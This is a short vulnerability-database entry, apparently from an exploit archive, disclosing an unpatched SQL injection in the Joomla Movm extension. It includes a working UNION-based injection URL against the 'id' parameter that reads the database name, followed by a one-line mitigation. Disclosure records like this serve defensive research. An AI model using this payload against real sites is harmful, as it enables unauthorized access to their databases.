vendor:
Movm
by:
Daniel Barragan 'D4NB4R'
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Movm
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:movm:movm
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Linux(bt5)-Windows(7ultimate)
2012
Joomla com_movm SQL Injection
Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry. It is compatible with Joomla2.5 and VirtueMart 2.0. This component can be Attacked from a mobile, put the following string in the url field: p0C http://server/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
Mitigation:
Ensure that user input is properly sanitized and validated before being used in SQL queries.